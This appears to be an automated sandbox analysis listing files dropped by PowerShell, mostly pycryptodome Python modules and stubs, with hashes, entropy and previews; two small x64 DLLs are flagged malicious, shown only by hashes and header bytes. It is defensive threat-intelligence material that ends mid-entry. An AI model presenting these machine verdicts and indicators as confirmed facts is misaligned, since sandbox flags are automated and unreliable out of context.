                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):10240
                                                                                                                                                                                                                      Entropy (8bit):4.730605326965181
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:MJVVdJvbrqTu6ZdpvY0IluLfcC75JiCKs89EVAElIijKDQGrbMZYJWJcX6gbW6s:CVddiT7pgTctEEaEDKDlMCWJcqgbW6
                                                                                                                                                                                                                      MD5:4D9C33AE53B38A9494B6FBFA3491149E
                                                                                                                                                                                                                      SHA1:1A069E277B7E90A3AB0DCDEE1FE244632C9C3BE4
                                                                                                                                                                                                                      SHA-256:0828CAD4D742D97888D3DFCE59E82369317847651BBA0F166023CB8ACA790B2B
                                                                                                                                                                                                                      SHA-512:BDFBF29198A0C7ED69204BF9E9B6174EBB9E3BEE297DD1EB8EB9EA6D7CAF1CC5E076F7B44893E58CCF3D0958F5E3BDEE12BD090714BEB5889836EE6F12F0F49E
                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r.`.r.`.r.`.{...p.`.g.a.p.`.9.a.q.`.r.a.Q.`.g.e.y.`.g.d.z.`.g.c.q.`.H.h.s.`.H.`.s.`.H...s.`.H.b.s.`.Richr.`.................PE..d....e.........." ...%............P........................................p............`..........................................'..|....'..P....P.......@...............`..,...."...............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...8....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..,....`.......&..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2225
                                                                                                                                                                                                                      Entropy (8bit):5.261890106278258
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:MCWOqrYJALrYJHdG43tDs3EsIG13NcuIH3z+9gNQjdod9qRh3jy:MCDqrYJALrYJHdt3EHGuIXztObQ
                                                                                                                                                                                                                      MD5:4505C49A1831D0C93256DA8E78C1564B
                                                                                                                                                                                                                      SHA1:63721BBAEA6BE397ADC3C4C1AA4335DBECCE215C
                                                                                                                                                                                                                      SHA-256:B8FF883AA293F99710EA591A58AA8D0D03FEEEDD5AA49C560B60A05FD3D413E1
                                                                                                                                                                                                                      SHA-512:3C6F8710D907EE676C8770012E4DF3542A063D40185D52EF4C93AB98E8227F2C85C353C5B82B519D97D016FE62052084E8E4FB0B8609EBB59440F85E613A2602
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2016, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):103
                                                                                                                                                                                                                      Entropy (8bit):4.5743153977203175
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:1REvgBAWxXfcAiTMXtKIOcSkWtWemUL/:1REYB9xXkVM96nRWe1/
                                                                                                                                                                                                                      MD5:FFE308959102B5607429CEF941E9560E
                                                                                                                                                                                                                      SHA1:3DA8DA002FEBDA41FE88459082E6CD8E57B9A5B3
                                                                                                                                                                                                                      SHA-256:2F8B0576992C17D8191119B78CF52F73540F11F2502360F71266F5FF848FB5B5
                                                                                                                                                                                                                      SHA-512:35EE20412D0AC941F7368DAB82E4A4996DF4058981BA6C07B24E99D533C2BE38E65B8911A7E99EE03A370DF63B557DD3F77839CA10BE939C98BE3E14BB650C65
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:from typing import List......def pycryptodome_filename(dir_comps: List[str], filename: str) -> str: ...
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):10877
                                                                                                                                                                                                                      Entropy (8bit):4.8802384608443194
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:9qrskrs9t3q/IPtqY6t+DqX5WZ0cKqRlpZK0Xn4n/noOKcNeJWAc:0rskrs9VqkYRt+DqX5WZrKq7pZpX4/oC
                                                                                                                                                                                                                      MD5:B87B25D98E8337122AE998F9ABF4D2B1
                                                                                                                                                                                                                      SHA1:9B3FC679A26A4300CAE579BACB9AF93677426927
                                                                                                                                                                                                                      SHA-256:67E1B4E201861F9A86E2DB1E548909CDEE46892CDCE59B3575CD9C7FF755BD54
                                                                                                                                                                                                                      SHA-512:B15ADEB7D2FC9A050E80499A2CA1D0FD7203E24523C1DF591012AF01E9118B98D384DE0429612D2FEB4D8B9563FBC31A501FE4EE7C53BA2B590DE0A3A0F077F5
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):933
                                                                                                                                                                                                                      Entropy (8bit):4.777842095513583
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:1RExEeWw8O8GLziQDqwhBhhB+OTlAavvsZPWJuL:8EeTLPqkVv+PiE
                                                                                                                                                                                                                      MD5:577B9FD6612492C13AAD9D5FDC396C43
                                                                                                                                                                                                                      SHA1:2840A5AE5DA3ADA506BC9E64F4FB1324C021FCA7
                                                                                                                                                                                                                      SHA-256:83C6B0310C82B4193830D59B3DABE23544ACF53FF2B53E0F918F2E8DB01F7485
                                                                                                                                                                                                                      SHA-512:67E8794F498344EBEE1F95351169355EA139AE6937E867B7716E7A06ECEB3AE30F430630370BE7B06F325434041D9581DFA3831FFBF5F67FF7F88AE24C2935F0
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:from typing import Any, Optional, Union....def load_lib(name: str, cdecl: str) -> Any : .....def c_ulong(x: int ) -> Any : .....def c_ulonglong(x: int ) -> Any : .....def c_size_t(x: int) -> Any : .....def create_string_buffer(init_or_size: Union[bytes,int], size: Optional[int]) -> Any : .....def get_c_string(c_string: Any) -> bytes : .....def get_raw_buffer(buf: Any) -> bytes : .....def c_uint8_ptr(data: Union[bytes, memoryview, bytearray]) -> Any : .......class VoidPointer(object):.. def get(self) -> Any : ..... def address_of(self) -> Any : .......class SmartPointer(object):.. def __init__(self, raw_pointer: Any, destructor: Any) -> None : ..... def get(self) -> Any : ..... def release(self) -> Any : .......backend : str..null_pointer : Any..ffi: Any....def load_pycryptodome_raw_lib(name: str, cdecl: str) -> Any : .....def is_buffer(x: Any) -> bool : .....def is_writeable_buffer(x: Any) -> bool : .....
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):10240
                                                                                                                                                                                                                      Entropy (8bit):4.685843290341897
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:6ZVVdJvbrqTu6ZdpvY0IluLfcC75JiCKs89EMz3DHWMoG4BcX6gbW6O:IVddiT7pgTctEEO3DLoHcqgbW6
                                                                                                                                                                                                                      MD5:8F4313755F65509357E281744941BD36
                                                                                                                                                                                                                      SHA1:2AAF3F89E56EC6731B2A5FA40A2FE69B751EAFC0
                                                                                                                                                                                                                      SHA-256:70D90DDF87A9608699BE6BBEDF89AD469632FD0ADC20A69DA07618596D443639
                                                                                                                                                                                                                      SHA-512:FED2B1007E31D73F18605FB164FEE5B46034155AB5BB7FE9B255241CFA75FF0E39749200EB47A9AB1380D9F36F51AFBA45490979AB7D112F4D673A0C67899EF4
                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r.`.r.`.r.`.{...p.`.g.a.p.`.9.a.q.`.r.a.Q.`.g.e.y.`.g.d.z.`.g.c.q.`.H.h.s.`.H.`.s.`.H...s.`.H.b.s.`.Richr.`.................PE..d....e.........." ...%............P........................................p............`.........................................`'..t....'..P....P.......@...............`..,...."...............................!..@............ ...............................text...x........................... ..`.rdata....... ......................@..@.data...8....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..,....`.......&..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):37233
                                                                                                                                                                                                                      Entropy (8bit):4.49642341890235
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:pdRLPqWbhH6msz9l3UquMwES5LItw+8hlx:pdRVHU9lkquMwES5LD+8Tx
                                                                                                                                                                                                                      MD5:9D11029C7D2E1C72C06B462CA3AA996B
                                                                                                                                                                                                                      SHA1:E783B5F0CC01BC86D0C16D3B4F54300D57C214C8
                                                                                                                                                                                                                      SHA-256:EEDE3556B282CDC640281A6AB6DF6C7EE20F9BE59C37B01AC09EA32F0F35887E
                                                                                                                                                                                                                      SHA-512:33D713F6CA8260831AD984D88F279441819308D7C9A3F7A92770D0731BDD74F90EFA46124FAAEACFE74EEACB84D1F6217CA6D01DED3270DF53A5C7D2311B535F
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- coding: ascii -*-..#..# Util/asn1.py : Minimal support for ASN.1 DER binary encoding...#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):3885
                                                                                                                                                                                                                      Entropy (8bit):4.815634844501543
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:Acab6f+hGLbu31eXTTVkwB60oofRTOB+Jk2:AcjuJYTTVkS6IF6+m2
                                                                                                                                                                                                                      MD5:1EFE3020CA61E0B1DA7B8680D73F84DA
                                                                                                                                                                                                                      SHA1:D996C31812286881EB3D6E3FA28715095EC5587F
                                                                                                                                                                                                                      SHA-256:4DB889724654605FF759C5B7D754174D13F71B3B621792E48AD0F9BE0CFCCC57
                                                                                                                                                                                                                      SHA-512:12D48E230826E09437536FB35642F434E71D5C219A6B61FAF064B785CD09E131F7595AC7DBE1A359C81B23DC24B3436F6AFDF9CE7EBD6961EBEDAF23F5F81F28
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:from typing import Optional, Sequence, Union, Set, Iterable....__all__ = ['DerObject', 'DerInteger', 'DerOctetString', 'DerNull',.. 'DerSequence', 'DerObjectId', 'DerBitString', 'DerSetOf']....# TODO: Make the encoded DerObjects their own type, so that DerSequence and..# DerSetOf can check their contents better....class BytesIO_EOF:.. def __init__(self, initial_bytes: bytes) -> None: ..... def set_bookmark(self) -> None: ..... def data_since_bookmark(self) -> bytes: ..... def remaining_data(self) -> int: ..... def read(self, length: int) -> bytes: ..... def read_byte(self) -> bytes: .......class DerObject:.. payload: bytes.. def __init__(self, asn1Id: Optional[int]=None, payload: Optional[bytes]=..., implicit: Optional[int]=None,.. constructed: Optional[bool]=False, explicit: Optional[int]=None) -> None: ..... def encode(self) -> bytes: ..... def decode(self, der_encoded: bytes, strict: bool=...) -> DerObject: .......class DerInte
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):97896
                                                                                                                                                                                                                      Entropy (8bit):4.090850897275891
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:1536:EnYL5QeQEUkknbkEEpeoc06BsJ7rajyCJrOiVDtT5U1464iPpAji6R449qVnSPt4:0YTXrtNajhJrOs5uPqe6CJn6KEVama39
                                                                                                                                                                                                                      MD5:3602B83C3AC94CFAAFA24C3A8C41895B
                                                                                                                                                                                                                      SHA1:5F4C1EB93B011F12A117C509CE7A878420D19307
                                                                                                                                                                                                                      SHA-256:6CE48B150797316B1DC24B6AD759F0A3F2D3D6DA339E5BCCEDEC9342800450E5
                                                                                                                                                                                                                      SHA-512:BC2F5B9DEB7D7678A67092CCCB1BEEA42E2B6BD9E028F9764C675340E247A8967D7704F054A1E4035C9698C8F7DD4FB3548502E157892E2DE36ADF917C3BD311
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#..# number.py : Number-theoretic functions..#..# Part of the Python Cryptography Toolkit..#..# Written by Andrew M. Kuchling, Barry A. Warsaw, and others..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):994
                                                                                                                                                                                                                      Entropy (8bit):4.898132103946567
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:1RE0x1JCvE59p+vE59eE59iLdUKhGnE597pcSpShFE59cSpShFE5vUyrfunVshdU:bxX7Z+crYnJescsje
                                                                                                                                                                                                                      MD5:81227B5A65D7EF13CB0247C9B7225673
                                                                                                                                                                                                                      SHA1:8954A181B5E8D7B31145E5C139935B9780E4D1EB
                                                                                                                                                                                                                      SHA-256:6BD67E3A908997245FB373BC1C4971BAC0CFDD5FC17D4B7CDBD3F51AD6774AF1
                                                                                                                                                                                                                      SHA-512:12F42616F440853BF94758392116879BE87073F515AE0C33454BFAC2D80140DE0FCC0469E34D8E06B42436A3EDEF4B5BE8D0E7C5EFCE413CE0F89041556CCA59
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:from typing import List, Optional, Callable......def ceil_div(n: int, d: int) -> int: .....def size (N: int) -> int: .....def getRandomInteger(N: int, randfunc: Optional[Callable]=None) -> int: .....def getRandomRange(a: int, b: int, randfunc: Optional[Callable]=None) -> int: .....def getRandomNBitInteger(N: int, randfunc: Optional[Callable]=None) -> int: .....def GCD(x: int,y: int) -> int: .....def inverse(u: int, v: int) -> int: .....def getPrime(N: int, randfunc: Optional[Callable]=None) -> int: .....def getStrongPrime(N: int, e: Optional[int]=0, false_positive_prob: Optional[float]=1e-6, randfunc: Optional[Callable]=None) -> int: .....def isPrime(N: int, false_positive_prob: Optional[float]=1e-6, randfunc: Optional[Callable]=None) -> bool: .....def long_to_bytes(n: int, blocksize: Optional[int]=0) -> bytes: .....def bytes_to_long(s: bytes) -> int: .....def long2str(n: int, blocksize: Optional[int]=0) -> bytes: .....def str2long(s: bytes) -> int: .......sieve_base: List[int]..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):6010
                                                                                                                                                                                                                      Entropy (8bit):4.8279694547928065
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:WKYFQHvoA6pDLeAIeCGtFaVBS3eKQM4ks58B1S9+Ow34eHPwAEx2pdDSSUSAJn7e:W9QHvilIUwpK5lBssOk4eldSE4n7R0ua
                                                                                                                                                                                                                      MD5:11D063AE5BC40D2D943DF399F95DDA04
                                                                                                                                                                                                                      SHA1:6D8C8391EEBDAE9FE2724F791B5D87A16E4D77CE
                                                                                                                                                                                                                      SHA-256:2CF7955872D7D8A23F12B9340AC867E8E342102FED7B80DBA25B6303D7992155
                                                                                                                                                                                                                      SHA-512:B2E2C98C03916DE5BB15F36B9A1972769825E1E514AFEA153AC292F3FFF716E589FCF009BD42459D5B7A35C456A3645F2D3D0E59DAFEF198563CDBF83F2B2245
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- coding: utf-8 -*-..#..# Util/py3compat.py : Compatibility code for handling Py3k / Python 2.x..#..# Written in 2010 by Thorsten Behrens..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWA
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):870
                                                                                                                                                                                                                      Entropy (8bit):4.791491758318878
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:1REgT3JtgPnrnIW9h3MnBbRFNU+U4Fu31954iEe1oHhASLjPMQ:pZtgMcUTkDTtoBjLt
                                                                                                                                                                                                                      MD5:E7EC097AA59EF78A17CCA1860BE69741
                                                                                                                                                                                                                      SHA1:A25E52635BA19E8324128B8900378458BDAA3AF2
                                                                                                                                                                                                                      SHA-256:A1913976F178C28B8A7C117093233AAC0D3E772C4876DA9C084382BB95F2AC2D
                                                                                                                                                                                                                      SHA-512:675F6249EF76BDA58D64ABF2BEB84DA58C04A4054F380BC3C2D63CA0D0CAB3342FB36A43925C6176D494F70AC1AEFD06DDB809F28F4A3412E857ACA1F42E6451
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:from typing import Union, Any, Optional, IO....Buffer = Union[bytes, bytearray, memoryview]....import sys....def b(s: str) -> bytes: .....def bchr(s: int) -> bytes: .....def bord(s: bytes) -> int: .....def tobytes(s: Union[bytes, str]) -> bytes: .....def tostr(b: bytes) -> str: .....def bytestring(x: Any) -> bool: .......def is_native_int(s: Any) -> bool: .....def is_string(x: Any) -> bool: .....def is_bytes(x: Any) -> bool: .......def BytesIO(b: bytes) -> IO[bytes]: .....def StringIO(s: str) -> IO[str]: .......if sys.version_info[0] == 2:.. from sys import maxint.. iter_range = xrange....else:.. from sys import maxsize as maxint.. iter_range = range....class FileNotFoundError:.. def __init__(self, err: int, msg: str, filename: str) -> None:.. pass....def _copy_bytes(start: Optional[int], end: Optional[int], seq: Buffer) -> bytes: .....
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):5587
                                                                                                                                                                                                                      Entropy (8bit):4.7939511946106
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:MwDqrYJALrYJHdt3EHGuIWYIzbJRSTdOqvdJLb9YmPhv+h:9qrskrs9t3q/Ik8gqlRdhy
                                                                                                                                                                                                                      MD5:C08EBC91E1A45FED150F8E5608E2AF15
                                                                                                                                                                                                                      SHA1:80AAA3BF9159A68321B464D3DA455D3EB3713F36
                                                                                                                                                                                                                      SHA-256:3E36AE472CE5CFBA3B02DBF0CC2A132F868C6DA8002F5B8E895C873DDB79A029
                                                                                                                                                                                                                      SHA-512:ACD238B1FC40197C4EA5DAFABD79A2BDBE4BE684F4BC0AB4361EAAD16DA92220A80D26E805D2FDDE01295FF959A91F4A830EE02F4FCB91F3BB0DEDBA295C01CD
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):249
                                                                                                                                                                                                                      Entropy (8bit):4.800678842548869
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:1REYBXyUzrIY3MTDyQdQAY0OXW6ah05gUQdByKj0ah05gv:1REYB3vIY3YyQnrOXAh05VQ6KZh05q
                                                                                                                                                                                                                      MD5:81C7899ED070F1D26338977374A4B853
                                                                                                                                                                                                                      SHA1:2627B47DA19BB2F2B8E7D25A5A57473C00C86550
                                                                                                                                                                                                                      SHA-256:CA7D073C74998CFFB501A2E6E1C99AF62F49272A5FDFB3527769E2A632DFE1A0
                                                                                                                                                                                                                      SHA-512:CF5299A774C61A0F84D6E1E4233F426CC9D854D809EEF0D6B1158EC0078E75C54C3141E835DC3D0F376B53EFB8DDE462B49B0A5093C63613B332617966F34D0C
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....def strxor(term1: bytes, term2: bytes, output: Optional[Buffer]=...) -> bytes: .....def strxor_c(term: bytes, c: int, output: Optional[Buffer]=...) -> bytes: .....
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):191
                                                                                                                                                                                                                      Entropy (8bit):4.787641890602914
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:UFo+CmMRJ4ZdK0CJOAlFGCJ7DkCAZFBVC5uQLCY3qXVLCVDvRqvljhfxXFqYLULZ:UvZdK0pAlV/kCAZ4sdXcVz8ljZRFqI5y
                                                                                                                                                                                                                      MD5:CAAC9B613D9F7C76FBB1F59F51BBC300
                                                                                                                                                                                                                      SHA1:B085C149A8C6051BE179605BA05E49FDC46ACC7D
                                                                                                                                                                                                                      SHA-256:73CF19A80E8AAA2D38047F8D4600D5239F9311AA76D68EC430079E44963B6FA6
                                                                                                                                                                                                                      SHA-512:EF4DD006C4B3CFD5C48F94F094C3D3A02FA5A5D8185E13203A7E6715CD64CFA98E9A34764364D08AF0C959A23A700E12AC2E404AD322491CA38E75F0B3FD80CF
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:__all__ = ['Cipher', 'Hash', 'Protocol', 'PublicKey', 'Util', 'Signature',.. 'IO', 'Math']....version_info = (3, 20, '0')....__version__ = ".".join([str(x) for x in version_info])..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):103
                                                                                                                                                                                                                      Entropy (8bit):4.320003818965119
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:1REvgBk8J0fWQLCfcJAOLRL+2MliHovcoFQy:1REYBb0fWpcFY2MtJN
                                                                                                                                                                                                                      MD5:BF77DB2C18C7E4E3E80EA7D09C2D8336
                                                                                                                                                                                                                      SHA1:682ADC1869A615EBC5152E303D7F10C9DF4800C1
                                                                                                                                                                                                                      SHA-256:748D33339311187C619DF8EAA40C8F1A8B4A4EB3E59DE4CDD90FA30105CD8351
                                                                                                                                                                                                                      SHA-512:ADD512240AB6D99FF0B4871C7F96849267CCB8CD5BE8BAB86579D5599434266F1C4C290DF395526C694110BDD67DCDA6970CEF39416AB87798AC78914AD87EB7
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:from typing import Tuple, Union....version_info : Tuple[int, int, Union[int, str]]..__version__ : str..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):472
                                                                                                                                                                                                                      Entropy (8bit):5.553838644412217
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:90at8t/f9MSnkxkOXw76+ExZ8g/2IkcMcja7k52OVf:DStFkfA76Tn2xcMb7ksU
                                                                                                                                                                                                                      MD5:ADAD6757D0151406CED920C7B9AB949F
                                                                                                                                                                                                                      SHA1:3073A93E41B82CE34A3D3173B2C2B823929231E4
                                                                                                                                                                                                                      SHA-256:6026433E608ACACF9BB59DFE63FFF807FFFEF7DC970E2B0007C3EE30A4FD3433
